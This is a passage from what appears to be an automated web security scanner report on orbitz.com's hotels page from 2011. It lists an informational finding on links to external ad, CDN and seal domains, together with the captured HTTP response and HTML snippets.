           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662805864&dsrc=7&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...

17.363. http://www.orbitz.com/hotels/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/hotels/

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/hotels/?z=4fae&r=1o

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/adsize=120x55&pos=footer&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=120x60&pos=searchform&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=1x1&pos=bottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=1x1&pos=middle&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=1x1&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=336x280&pos=bottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=336x600&pos=external&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=468x60&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=519x120&pos=merchantMiddle&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=519x200&pos=merchantBottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=544x300&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=728x90&pos=bottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/click.ng/adsize=728x90&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=120x55&pos=footer&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=120x60&pos=searchform&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=1x1&pos=bottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=1x1&pos=middle&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=1x1&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=336x280&pos=bottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=336x600&pos=external&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=468x60&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=519x120&pos=merchantMiddle&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=519x200&pos=merchantBottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=544x300&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=728x90&pos=bottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.revresda.com/image.ng/adsize=728x90&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http:/www.orbitz.com/&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US
http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif
http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif
http://www.tnetnoc.com/siteImages/ORB/banners/hotel/searchForm/telesales/ORB_Telesales_HotelSearchBot-1.png
http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png
http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png
http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png
http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png
http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll1.css
http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll2.css
http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js
http://www.tnetnoc.com/static/27.4.7/style/global/printAll.css
http://www.truste.org/ivalidate.php?url=www.orbitz.com&sealid=101
https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&dn=www.orbitz.com&lang=en

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=45CF4CA88B60AF8804E112EBD74428B3; Path=/
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2196p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Set-Cookie: myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; Expires=Tue, 28-Jan-2031 16:12:00 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 16:12:00 GMT
Set-Cookie: NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e33b2045525d5f4f58455e445a4a4217b9;path=/
Content-Length: 107727

...[SNIP]...
<link rel="canonical" href="http://www.orbitz.com/hotels/"/>
<link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/27.4.7/POS/ORB/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/27.4.7/style/global/printAll.css" media="print">
               
       <script type="text/javascript" src="http://www.tnetnoc.com/static/27.4.7/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=728x90&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=728x90&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=468x60&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=468x60&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<a href="http://www.orbitz.com/" class="link"> <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png" alt="Orbitz" height="28" width="153" class="logo" />
    </a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=336x600&pos=external&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=336x600&pos=external&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad searchFormAd"><a href="http://www.revresda.com/click.ng/adsize=120x60&pos=searchform&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=120x60&pos=searchform&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="telesalesImages">
        <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/searchForm/telesales/ORB_Telesales_HotelSearchBot-1.png" alt="Call us to book 1-800-649-9920" height="54" width="364" />
    </div>
...[SNIP]...
<div class="ad adBelowSearchForm"><a href="http://www.revresda.com/click.ng/adsize=336x280&pos=bottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=336x280&pos=bottom&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
<div class="ad "><a href="http://www.revresda.com/click.ng/adsize=544x300&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US"><img src="http://www.revresda.com/image.ng/adsize=544x300&pos=top&Section=main&channel=hotel&tile=1296663120525&site=orbitz&platform=austin&refUrl=http%3A%2F%2Fwww.orbitz.com%2F&numberOfAdultsRoom1=0&numberOfAdultsRoom0=2&location=US&numberOfAdultsRoom3=0&numberOfAdultsRoom2=0&secure=false&numberOfRooms=1&m=0&searchType=hotel&CookieName=PRO2&currency=USD&passengers=a&v=173.193.214.243-3953790720.30125555&search=Search&hotelSearchType=keyword&subdomain=orbitz&language=en_US" border="0" alt="Advertisement" /></a>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/value/value/small/Value_sml-1.png" alt="Value" height="13" width="13" />
    <p class="promotionText">
...[SNIP]...
<div class="starRating">
                <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" />
    </div>
...[SNIP]...
</span>
